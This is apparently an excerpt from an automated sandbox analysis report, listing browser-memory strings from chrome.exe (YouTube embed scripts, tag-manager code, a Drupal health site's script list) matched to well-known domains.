                                  Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}w.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2344383176.000028EC06ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: s\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FFU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: scriptQIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js@@ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.jsb equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script 
src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
                                  Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340699100.000028EC065E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: this.dF.WD&&(B.authuser=this.dF.WD);this.dF.pageId&&(B.pageid=this.dF.pageId);isNaN(this.cryptoPeriodIndex)||(B.cpi=this.cryptoPeriodIndex.toString());var h=(h=/_(TV|STB|GAME|OTT|ATV|BDP)_/.exec(g.Va()))?h[1]:"";h==="ATV"&&(B.cdt=h);this.V=B;this.V.session_id=R;this.N=!0;this.U.flavor==="widevine"&&(this.V.hdr="1");this.U.flavor==="playready"&&(z=Number(zk(z.experiments,"playready_first_play_expiration")),!isNaN(z)&&z>=0&&(this.V.mfpe=""+z),this.N=!1);z="";g.tc(this.U)?NE(this.U)?(R=T.U)&&(z="https://www.youtube.com/api/drm/fps?ek="+ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: tionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340949325.000028EC067D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: unction(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: urrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: var M6={};var HF7={X2:[{RD:/Unable to load player module/,weight:20},{RD:/Failed to fetch/,weight:500},{RD:/XHR API fetch failed/,weight:10},{RD:/JSON parsing failed after XHR fetch/,weight:10},{RD:/Retrying OnePlatform request/,weight:10},{RD:/CSN Missing or undefined during playback association/,weight:100},{RD:/Non-recoverable error. Do not retry./,weight:0},{RD:/Internal Error. Retry with an exponential backoff./,weight:0},{RD:/API disabled by application./,weight:0}],Zz:[{callback:GDP,weight:500}]};var Pfr=/[&\?]action_proxy=1/,$el=/[&\?]token=([\w-]*)/,xeX=/[&\?]video_id=([\w-]*)/,vFY=/[&\?]index=([\d-]*)/,DeP=/[&\?]m_pos_ms=([\d-]*)/,KYd=/[&\?]vvt=([\w-]*)/,Uez="ca_type dt el flash u_tz u_his u_h u_w u_ah u_aw u_cd u_nplug u_nmime frm u_java bc bih biw brdim vis wgl".split(" "),kDB="www.youtube-nocookie.com youtube-nocookie.com www.youtube-nocookie.com:443 youtube.googleapis.com www.youtubeedu.com www.youtubeeducation.com video.google.com redirector.gvt1.com".split(" "),QdB={android:"ANDROID", equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: var TH=function(a,b,c,d,e){var f=RE("fsl",c?"nv.mwt":"mwt",0),g;g=c?RE("fsl","nv.ids",[]):RE("fsl","ids",[]);if(!g.length)return!0;var h=WE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);O(121);if(m==="https://www.facebook.com/tr/")return O(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!nD(h,pD(b, equals www.facebook.com (Facebook)
                                  Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com=1 equals www.linkedin.com (Linkedin)
                                  Source: chrome.exe, 00000000.00000002.2502048114.000028EC06D54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com(N equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2498572805.000028EC05C20000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com0 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2476559206.000028EC02E3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485773778.000028EC0386C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com@Z equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comED equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489024413.000028EC03E2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485567217.000028EC03804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comL equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comd.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470845062.000028EC026BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.come.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2480846916.000028EC03334000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.commcaontent-producer.web.app equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comofpalmlakkmbjdnl equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2467230860.000028EC0223C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.comq equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323044133.000028EC04024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com|@G equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: xmlhttprequest>6https://www.youtube.com/youtubei/v1/log_event?alt=json7 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: yOb=function(B,z){if(!B.T["0"]){var T=new N_("0","fakesb",{video:new uF(0,0,0,void 0,void 0,"auto")});B.T["0"]=z?new XU(new g.QP("http://www.youtube.com/videoplayback"),T,"fake"):new Lj(new g.QP("http://www.youtube.com/videoplayback"),T,new PL(0,0),new PL(0,0))}}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: yt3.ggpht.comtionFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q}"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}ce.js"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352362951.000028EC0648C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}eading .panel-title').removeClass('js-form-required form-required'); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}P$4c943c22-5c79-4450-af80-a88a7cf5104bf5104b equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var 